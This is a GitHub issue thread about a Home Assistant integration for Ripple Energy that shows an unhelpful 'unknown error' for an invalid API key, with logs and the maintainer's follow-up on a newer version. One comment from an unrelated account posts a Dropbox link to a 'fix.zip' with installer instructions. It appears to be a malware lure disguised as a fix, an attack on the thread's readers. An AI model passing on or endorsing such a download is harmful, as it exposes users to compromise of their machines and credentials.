### ISSUE TITLE
Unknown error occurred

### ISSUE THREAD

**Issue by reedy** [ryanbdclark/ripple_energy#12]
![image](https://github.com/user-attachments/assets/c5b3271a-f685-4c18-a07c-009a136d4d88)

Using an api key straight from the members part of the website...

Just displaying "unknown error occurred" isn't helpful, but the logs aren't much more helpful either:

```

This error originated from a custom integration.

Logger: custom_components.ripple_energy.config_flow
Source: custom_components/ripple_energy/config_flow.py:59
integration: Ripple Energy
First occurred: 02:16:06 (8 occurrences)
Last logged: 02:22:16

Unexpected exception
Traceback (most recent call last):
  File "/config/custom_components/ripple_energy/config_flow.py", line 59, in async_step_user
    data = await ripple_api.request(assets=ASSETS)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.12/site-packages/pyrippleapi/api.py", line 89, in request
    raise RippleAuthenticationError("Invalid API Key")
pyrippleapi.exceptions.RippleAuthenticationError: Invalid API Key
```

**Comment by llowvxe** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by reedy** [comment]
Apparently worked fine when not done via the HA mobile app...

**Comment by ryanbdclark** [comment]
The new version 2024.8.2 now has a more verbose error if an invalid api key was entered. 

![image](https://github.com/user-attachments/assets/0375deb5-1ae6-4ff8-a2c1-9e8a8a34394a)

The actual ripple API just returns {'error': 'Not authenticated'} if you put in an invalid API key and I'm assuming that this is the only time this error is returned however there is no documentation on this.

I have only ever seen the above error so not sure if the above can also be caused by something else. If the error returned from the API is not the above then the error message displayed will still be unknown error occurred. If this happens I would really need the actual error response from ripple to improve this error message and see what the error is.
